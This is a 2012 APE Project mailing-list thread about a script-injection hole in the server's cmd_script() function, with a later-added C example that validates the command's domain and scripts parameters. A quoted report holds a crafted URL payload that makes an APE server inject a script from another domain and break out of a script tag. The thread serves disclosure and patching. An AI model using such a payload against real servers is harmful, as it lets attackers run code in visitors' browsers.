I took a look at cmd_script() and I'm not C savvy, but I don't think that
command does what we think it does.

I personally thought it injected JavaScript directly into the server
environment, but it doesn't look like it. I have to test it and see.
On Dec 12, 2012 11:09 PM, "UTAN" <[email protected]> wrote:

> Pablo,
>
> I don't seem to duplicate it.
>
> I have put your hook as follows:
> Ape.registerHookCmd('script', function(){
>     Ape.log('Script was called successfully');
>     //return false;
> });
>
> and tried to run it through the Ape server URL, and it doesn't log anything...
> But I managed to find the function in that file mentioned above.
>
> On Dec 12, 4:58 pm, Pablo Tejada <[email protected]> wrote:
> > You would have to patch the file, rebuild the server and replace the
> > generated aped file with the one in your installation.
> >
> > Before digging into the source can you verify if the hook I mentioned above
> > fixes this bug?
> > On Dec 12, 2012 7:52 PM, "UTAN" <[email protected]> wrote:
> >
> > > Indeed, thanks for pointing it out, Pablo.
> > > Now, should I just edit and patch the file and then reload Ape,
> > > or do I have to reinstall all over?
> >
> > > On Dec 12, 10:20 am, Pablo Tejada <[email protected]> wrote:
> > > > He did mention src/cmd.c
> > > > On Dec 12, 2012 1:15 PM, "UTAN" <[email protected]> wrote:
> >
> > > > > Have you released any patch, if you made some workaround what file
> > > > > should we patch?
> >
> > > > > On Dec 11, 3:56 am, tr!ckle <[email protected]> wrote:
> > > > > > > I managed recently with an issue that allows to inject any js script by
> > > > > > > preparing link like:
> >
> > >
> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscrip...]}}]
> >
> > > > > > > It allows either attaching a script from your URL or injecting a script
> > > > > > > directly, such as in this example.
> >
> > > > > > > The solution for this issue is to filter both params domain and scripts in
> > > > > > > file src/cmd.c (function: cmd_script()) in ape server.
> >
> > > > > --
> > > > > You received this message because you are subscribed to the Google
> > > > > Groups "APE Project" group.
> > > > > To post to this group, send email to [email protected]
> > > > > To unsubscribe from this group, send email to
> > > > > [email protected]
> > > > > For more options, visit this group at
> > > > >http://groups.google.com/group/ape-project?hl=en
> > > > > ---
> > > > > APE Project (Ajax Push Engine)
> > > > > Official website :http://www.ape-project.org/
> > > > > Git Hub :http://github.com/APE-Project/
> >
>
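
Added example (not part of the thread and not APE source code): one way to filter the domain and scripts params as tr!ckle suggests, written as stand-alone C. The function names, length limits and character allowlists are assumptions, and the checks are meant to run on the values after URL and JSON decoding.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helpers for the "script" command's params; not APE source.
 * Run them on the values after URL and JSON decoding. */

static int ascii_alnum(unsigned char c)
{
    return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'z') ||
           (c >= 'A' && c <= 'Z');
}

/* "domain": host-name characters only, no empty labels, at most 253 bytes. */
int domain_param_ok(const char *s)
{
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > 253 || s[0] == '.' || s[n - 1] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.' && s[i + 1] == '.')
            return 0;                      /* empty label */
        if (!ascii_alnum(c) && c != '-' && c != '.')
            return 0;                      /* quotes, <, >, spaces, ... */
    }
    return 1;
}

/* "scripts" entry: http(s) URL built from a small allowlist; quotes, angle
 * brackets, backslashes, whitespace and control bytes are all rejected. */
int script_param_ok(const char *s)
{
    size_t n = s ? strlen(s) : 0;
    if (n == 0 || n > 2048)
        return 0;
    if (strncmp(s, "http://", 7) != 0 && strncmp(s, "https://", 8) != 0)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!ascii_alnum(c) && !strchr("-._~:/?&=%+", c))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample values, not taken from a real request. */
    printf("%d %d\n", domain_param_ok("any.domain"),
           script_param_ok("http://cdn.example/ape.js\"><x"));
    return 0;
}
```

A request whose domain or any scripts entry fails its check would be rejected before the values are used.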

